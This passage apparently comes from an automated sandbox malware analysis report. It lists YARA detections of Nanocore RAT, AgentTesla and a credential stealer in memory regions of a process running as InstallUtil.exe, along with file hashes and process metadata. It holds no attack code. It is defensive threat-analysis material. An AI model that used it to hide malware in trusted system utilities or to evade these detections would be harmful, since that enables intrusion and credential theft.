                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                              Target ID:33
                              Start time:13:25:00
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Imagebase:0x9a0000
                              File size:41064 bytes
                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000000.479060182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000021.00000000.479060182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.509482353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000021.00000002.509482353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000000.479438317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000021.00000000.479438317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.534538183.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000000.479787922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000021.00000000.479787922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000021.00000000.478666137.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000021.00000000.478666137.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                              No disassembly